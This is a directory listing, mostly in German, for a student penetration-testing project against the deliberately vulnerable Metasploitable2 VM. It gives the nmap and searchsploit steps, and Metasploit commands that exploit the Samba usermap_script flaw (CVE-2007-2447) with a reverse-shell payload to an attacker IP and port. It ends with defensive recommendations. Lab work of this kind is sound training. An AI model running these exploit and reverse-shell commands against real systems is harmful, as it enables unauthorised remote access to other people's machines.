Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
ReconnaissanceVulnerability ScannersNetwork MappingVulnerability AnalysisExploitationPost-ExploitationPenetration TestingLearning & EducationLabs & Practice

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

Repository anzeigenWebseite
1vor 11 MonatenNoch nicht geprüft

Über

Hands-on pentest project using Kali Linux vs Metasploitable2. Includes full workflow: Nmap scanning, enumeration, Metasploit exploitation (Samba CVE-2007-2447), post-exploitation validation, and mitigation steps. Repo contains commands, outputs, and report showing both offensive techniques and defensive recommendations.

Teilen

Praktikumsprojekt 2 — Penetrationstests auf Metasploitable2

  • Zusammenfassung: Dieses Projekt zeigt einen vollständigen Penetrationstest-Workflow: Aufklärung, Enumeration, Exploitation, Post-Exploitation-Validierung und Empfehlungen zur Schadensbegrenzung. Das verwendete Ziel ist Metasploitable2 und die Angriffsbox ist Kali Linux.

  • Werkzeuge: Kali Linux (Angreifer) Nmap (Aufklärung) Metasploit Framework (Exploitation) SearchSploit / Exploit-DB (Sichtung)

Durchgeführte Schritte:

  1. Scannen: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x Identifizierte Dienste (Beispiele): vsftpd 2.3.4 (Port 21 Banner), Samba smbd 3.x (Port 445).
  2. Enumeration & Triage: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 Dienste mit potenziellen Exploits abgeglichen (vsftpd Backdoor, Samba username-map).
  3. Exploitation
  • vsftpd Backdoor (CVE-2011-2523) versucht — Nmap-Banner vorhanden, aber Dienst nicht reagiert; Exploit hat keine Session erstellt.
  • Samba (CVE-2007-2447) erfolgreich ausgenutzt: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit Interaktive Shell erhalten und Benutzerkontext validiert.
  1. Post-Exploitation
  • Systeminformationen überprüft: id uname -a
  • Beweise und Screenshots gesammelt.
  1. Empfehlungen zur Schadensbegrenzung
  • Regelmäßiges Scannen und Bestandsaufnahme der Assets.
  • Zeitnahes Patchen und Versionsupgrades (Samba aktualisieren).
  • Zugriff auf kritische Ports einschränken (Firewall-Regeln).
  • Nicht benötigte Dienste und anonymen Zugriff deaktivieren.
  • Prinzip der geringsten Privilegien auf Freigaben und Konten anwenden.
  • Netzwerksegmentierung und Protokollierung/Überwachung.
  • Planung der Incident-Response.

Ergebnis Erfolgreich eine Remote-Shell über einen Samba-Exploit erhalten, den Angriffspfad dokumentiert und einen Maßnahmenplan erstellt. Vollständige Logs und Befehlsausgaben befinden sich im Ordner scans/.

Tool herunterladen